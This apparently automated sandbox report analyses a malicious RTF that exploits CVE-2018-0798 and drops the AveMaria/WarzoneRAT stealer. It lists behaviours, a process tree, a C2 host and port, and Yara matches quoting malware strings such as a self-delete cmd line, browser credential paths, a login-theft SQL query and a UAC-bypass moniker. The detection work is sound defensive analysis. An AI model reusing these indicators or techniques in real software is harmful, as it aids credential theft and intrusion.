Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf

Overview

General Information

Sample Name:	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf
Analysis ID:	778329
MD5:	43d3572df61172edf51e252c1e83df93
SHA1:	611c9a423db33c48841a6fa0c3cb2d7d70380902
SHA256:	9db4c737fd89168798872f75f407b633bf383afe013d462206e2105bb53dd3ce
Tags:	rtf
Infos:

Detection

AveMaria, UACMe

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected UACMe UAC Bypass tool

Yara detected AveMaria stealer

Multi AV Scanner detection for domain / URL

Maps a DLL or memory area into another process

Office equation editor drops PE file

Uses dynamic DNS services

Installs a global keyboard hook

Increases the number of concurrent connection per server for Internet Explorer

Contains functionality to hide user accounts

Contains functionality to register a low level keyboard hook

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Contains functionality to steal e-mail passwords

Found evasive API chain checking for user administrative privileges

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Contains functionality to steal Chrome passwords or cookies

C2 URLs / IPs found in malware configuration

Office equation editor establishes network connection

Contains functionality to inject threads in other processes

Contains functionality to detect sleep reduction / modifications

Found decision node followed by non-executed suspicious APIs

Contains functionality to create new users

Antivirus or Machine Learning detection for unpacked file

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Contains functionality to download and execute PE files

Checks if the current process is being debugged

Contains functionality to retrieve information about pressed keystrokes

May check if the current machine is a sandbox (GetTickCount - Sleep)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Stores large binary data to the registry

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Potential document exploit detected (performs DNS queries)

Contains functionality to check if a connection to the internet is available

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Detected TCP or UDP traffic on non-standard ports

Office Equation Editor has been started

Contains functionality to download and launch executables

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2820 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 2724 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

word.exe (PID: 1968 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 5A474DC9553AA8A2FDB2996CA48C99B8)

gnwnekc.exe (PID: 508 cmdline: "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v MD5: 5985907FDAB0FFD71DFBB1A96598D2D4)

gnwnekc.exe (PID: 2052 cmdline: C:\Users\user\AppData\Local\Temp\gnwnekc.exe MD5: 5985907FDAB0FFD71DFBB1A96598D2D4)

wwpicppqkrphnp.exe (PID: 1580 cmdline: "C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe" "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\A MD5: 5985907FDAB0FFD71DFBB1A96598D2D4)

EQNEDT32.EXE (PID: 852 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "mcmac.duckdns.org", "port": 7410}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf	SUSP_INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.	ditekSHen	0x66:$obj2: \objdata 0x22f:$obj3: \objupdate
SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x66:$obj2: \objdata 0x22f:$obj3: \objupdate

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x18df0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x18df0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x18df0:$c1: Elevation:Administrator!new:
00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x13b7c:$s1: RDPClip 0x14650:$s2: Grabber 0x13bae:$s5: @\cmd.exe 0x18f10:$s6: /n:%temp%\ellocnak.xml 0x18f40:$s7: Hey I'm Admin 0x1261c:$s8: warzone160
00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x144c0:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x12ff4:$a2: SMTP Password 0x18df0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x18f10:$a7: /n:%temp%\ellocnak.xml 0x18f40:$a9: Hey I'm Admin 0x12ebc:$a10: \logins.json 0x13504:$a11: Accounts\Account.rec0 0x1261c:$a12: warzone160
00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp	AveMaria_WarZone	unknown	unknown	0x144c0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x143b8:$str2: MsgBox.exe 0x1452c:$str4: \System32\cmd.exe 0x13610:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x12ff4:$str8: SMTP Password 0x12938:$str11: \Google\Chrome\User Data\Default\Login Data 0x135dc:$str12: \sqlmap.dll 0x12914:$str14: SELECT * FROM logins 0x18df0:$str16: Elevation:Administrator!new 0x18f10:$str17: /n:%temp%
00000008.00000003.913528927.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp	AveMaria_WarZone	unknown	unknown	0x144c0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x143b8:$str2: MsgBox.exe 0x1452c:$str4: \System32\cmd.exe 0x13610:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x12ff4:$str8: SMTP Password 0x12938:$str11: \Google\Chrome\User Data\Default\Login Data 0x135dc:$str12: \sqlmap.dll 0x12914:$str14: SELECT * FROM logins
00000008.00000003.913307044.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x1c8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1c8:$c1: Elevation:Administrator!new:
00000008.00000003.913307044.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000008.00000000.911346295.0000000000418000.00000040.80000000.00040000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xdf0:$c1: Elevation:Administrator!new:
00000008.00000000.911346295.0000000000418000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000008.00000003.913357063.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x10a50:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x171c8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x10a50:$c1: Elevation:Administrator!new: 0x171c8:$c1: Elevation:Administrator!new:
00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1f18:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x5a18:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x14d98:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0xa4c:$a2: SMTP Password 0x454c:$a2: SMTP Password 0x138cc:$a2: SMTP Password 0x10a50:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x171c8:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x10b70:$a7: /n:%temp%\ellocnak.xml 0x172e8:$a7: /n:%temp%\ellocnak.xml 0x10ba0:$a9: Hey I'm Admin 0x17318:$a9: Hey I'm Admin 0x914:$a10: \logins.json 0x4414:$a10: \logins.json 0x13794:$a10: \logins.json 0xf5c:$a11: Accounts\Account.rec0 0x4a5c:$a11: Accounts\Account.rec0 0x13ddc:$a11: Accounts\Account.rec0 0x74:$a12: warzone160 0x3b74:$a12: warzone160 0x12ef4:$a12: warzone160
00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xa50:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x71c8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xa50:$c1: Elevation:Administrator!new: 0x71c8:$c1: Elevation:Administrator!new:
00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x4d98:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x38cc:$a2: SMTP Password 0xa50:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x71c8:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xb70:$a7: /n:%temp%\ellocnak.xml 0x72e8:$a7: /n:%temp%\ellocnak.xml 0xba0:$a9: Hey I'm Admin 0x7318:$a9: Hey I'm Admin 0x3794:$a10: \logins.json 0x3ddc:$a11: Accounts\Account.rec0 0x2ef4:$a12: warzone160
00000008.00000003.913377903.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x157f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x157f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x157f0:$c1: Elevation:Administrator!new:
00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x1237c:$s1: RDPClip 0x12e50:$s2: Grabber 0x123ae:$s5: @\cmd.exe 0x15910:$s6: /n:%temp%\ellocnak.xml 0x15940:$s7: Hey I'm Admin 0x10e1c:$s8: warzone160
00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x12cc0:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x117f4:$a2: SMTP Password 0x157f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x15910:$a7: /n:%temp%\ellocnak.xml 0x15940:$a9: Hey I'm Admin 0x116bc:$a10: \logins.json 0x11d04:$a11: Accounts\Account.rec0 0x10e1c:$a12: warzone160
00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp	AveMaria_WarZone	unknown	unknown	0x12cc0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x12bb8:$str2: MsgBox.exe 0x12d2c:$str4: \System32\cmd.exe 0x11e10:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x117f4:$str8: SMTP Password 0x11138:$str11: \Google\Chrome\User Data\Default\Login Data 0x11ddc:$str12: \sqlmap.dll 0x11114:$str14: SELECT * FROM logins 0x157f0:$str16: Elevation:Administrator!new 0x15910:$str17: /n:%temp%
Process Memory Space: gnwnekc.exe PID: 508	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: gnwnekc.exe PID: 508	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: gnwnekc.exe PID: 2052	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: gnwnekc.exe PID: 2052	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.3.gnwnekc.exe.8d6540.5.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x5c88:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.3.gnwnekc.exe.8d6540.5.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x5c88:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5c88:$c1: Elevation:Administrator!new:
8.3.gnwnekc.exe.8d6540.5.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.3.gnwnekc.exe.8d6540.5.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.3.gnwnekc.exe.8d6540.5.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x2f14:$s1: RDPClip 0x39e8:$s2: Grabber 0x2f46:$s5: @\cmd.exe 0x5da8:$s6: /n:%temp%\ellocnak.xml 0x5dd8:$s7: Hey I'm Admin 0x19b4:$s8: warzone160
8.3.gnwnekc.exe.8d6540.5.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x3858:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x238c:$a2: SMTP Password 0x5c88:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5da8:$a7: /n:%temp%\ellocnak.xml 0x5dd8:$a9: Hey I'm Admin 0x2254:$a10: \logins.json 0x289c:$a11: Accounts\Account.rec0 0x19b4:$a12: warzone160
8.3.gnwnekc.exe.8d6540.5.raw.unpack	AveMaria_WarZone	unknown	unknown	0x3858:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x3750:$str2: MsgBox.exe 0x38c4:$str4: \System32\cmd.exe 0x29a8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x238c:$str8: SMTP Password 0x1cd0:$str11: \Google\Chrome\User Data\Default\Login Data 0x2974:$str12: \sqlmap.dll 0x1cac:$str14: SELECT * FROM logins 0x5c88:$str16: Elevation:Administrator!new 0x5da8:$str17: /n:%temp%
8.2.gnwnekc.exe.400000.0.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x157f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.2.gnwnekc.exe.400000.0.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x157f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x157f0:$c1: Elevation:Administrator!new:
8.2.gnwnekc.exe.400000.0.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.gnwnekc.exe.400000.0.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.2.gnwnekc.exe.400000.0.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x1237c:$s1: RDPClip 0x12e50:$s2: Grabber 0x123ae:$s5: @\cmd.exe 0x15910:$s6: /n:%temp%\ellocnak.xml 0x15940:$s7: Hey I'm Admin 0x10e1c:$s8: warzone160
8.2.gnwnekc.exe.400000.0.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x12cc0:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x117f4:$a2: SMTP Password 0x157f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x15910:$a7: /n:%temp%\ellocnak.xml 0x15940:$a9: Hey I'm Admin 0x116bc:$a10: \logins.json 0x11d04:$a11: Accounts\Account.rec0 0x10e1c:$a12: warzone160
8.2.gnwnekc.exe.400000.0.unpack	AveMaria_WarZone	unknown	unknown	0x12cc0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x12bb8:$str2: MsgBox.exe 0x12d2c:$str4: \System32\cmd.exe 0x11e10:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x117f4:$str8: SMTP Password 0x11138:$str11: \Google\Chrome\User Data\Default\Login Data 0x11ddc:$str12: \sqlmap.dll 0x11114:$str14: SELECT * FROM logins 0x157f0:$str16: Elevation:Administrator!new 0x15910:$str17: /n:%temp%
8.2.gnwnekc.exe.400000.0.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x18df0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.2.gnwnekc.exe.400000.0.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x18df0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x18df0:$c1: Elevation:Administrator!new:
8.2.gnwnekc.exe.400000.0.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.gnwnekc.exe.400000.0.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.2.gnwnekc.exe.400000.0.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x13b7c:$s1: RDPClip 0x14650:$s2: Grabber 0x13bae:$s5: @\cmd.exe 0x18f10:$s6: /n:%temp%\ellocnak.xml 0x18f40:$s7: Hey I'm Admin 0x1261c:$s8: warzone160
8.2.gnwnekc.exe.400000.0.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x144c0:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x12ff4:$a2: SMTP Password 0x18df0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x18f10:$a7: /n:%temp%\ellocnak.xml 0x18f40:$a9: Hey I'm Admin 0x12ebc:$a10: \logins.json 0x13504:$a11: Accounts\Account.rec0 0x1261c:$a12: warzone160
8.2.gnwnekc.exe.400000.0.raw.unpack	AveMaria_WarZone	unknown	unknown	0x144c0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x143b8:$str2: MsgBox.exe 0x1452c:$str4: \System32\cmd.exe 0x13610:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x12ff4:$str8: SMTP Password 0x12938:$str11: \Google\Chrome\User Data\Default\Login Data 0x135dc:$str12: \sqlmap.dll 0x12914:$str14: SELECT * FROM logins 0x18df0:$str16: Elevation:Administrator!new 0x18f10:$str17: /n:%temp%
8.0.gnwnekc.exe.400000.2.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.0.gnwnekc.exe.400000.2.unpack	AveMaria_WarZone	unknown	unknown	0x134c0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x133b8:$str2: MsgBox.exe 0x1352c:$str4: \System32\cmd.exe 0x12610:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x11ff4:$str8: SMTP Password 0x11938:$str11: \Google\Chrome\User Data\Default\Login Data 0x125dc:$str12: \sqlmap.dll 0x11914:$str14: SELECT * FROM logins
8.3.gnwnekc.exe.8d4cd0.2.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.3.gnwnekc.exe.8d4cd0.2.unpack	AveMaria_WarZone	unknown	unknown	0x28c8:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x27c0:$str2: MsgBox.exe 0x2934:$str4: \System32\cmd.exe 0x1a18:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x19e4:$str12: \sqlmap.dll
8.3.gnwnekc.exe.8db448.3.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.3.gnwnekc.exe.8db448.3.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
8.3.gnwnekc.exe.8db448.3.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.3.gnwnekc.exe.8d4cd0.2.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x74f8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.3.gnwnekc.exe.8d4cd0.2.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x74f8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new: 0x74f8:$c1: Elevation:Administrator!new:
8.3.gnwnekc.exe.8d4cd0.2.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.3.gnwnekc.exe.8d4cd0.2.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.3.gnwnekc.exe.8d4cd0.2.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x4784:$s1: RDPClip 0x5258:$s2: Grabber 0x47b6:$s5: @\cmd.exe 0xea0:$s6: /n:%temp%\ellocnak.xml 0x7618:$s6: /n:%temp%\ellocnak.xml 0xed0:$s7: Hey I'm Admin 0x7648:$s7: Hey I'm Admin 0x3224:$s8: warzone160
8.3.gnwnekc.exe.8d4cd0.2.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x50c8:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x3bfc:$a2: SMTP Password 0xd80:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x74f8:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xea0:$a7: /n:%temp%\ellocnak.xml 0x7618:$a7: /n:%temp%\ellocnak.xml 0xed0:$a9: Hey I'm Admin 0x7648:$a9: Hey I'm Admin 0x3ac4:$a10: \logins.json 0x410c:$a11: Accounts\Account.rec0 0x3224:$a12: warzone160
8.3.gnwnekc.exe.8d4cd0.2.raw.unpack	AveMaria_WarZone	unknown	unknown	0x50c8:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x4fc0:$str2: MsgBox.exe 0x5134:$str4: \System32\cmd.exe 0x4218:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x3bfc:$str8: SMTP Password 0x3540:$str11: \Google\Chrome\User Data\Default\Login Data 0x41e4:$str12: \sqlmap.dll 0x351c:$str14: SELECT * FROM logins 0xd80:$str16: Elevation:Administrator!new 0x74f8:$str16: Elevation:Administrator!new 0xea0:$str17: /n:%temp% 0x7618:$str17: /n:%temp%
6.2.gnwnekc.exe.434a70.1.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
6.2.gnwnekc.exe.434a70.1.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
6.2.gnwnekc.exe.434a70.1.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.0.gnwnekc.exe.400000.5.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x157f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.0.gnwnekc.exe.400000.5.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x157f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x157f0:$c1: Elevation:Administrator!new:
8.0.gnwnekc.exe.400000.5.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.0.gnwnekc.exe.400000.5.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.0.gnwnekc.exe.400000.5.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x1237c:$s1: RDPClip 0x12e50:$s2: Grabber 0x123ae:$s5: @\cmd.exe 0x15910:$s6: /n:%temp%\ellocnak.xml 0x15940:$s7: Hey I'm Admin 0x10e1c:$s8: warzone160
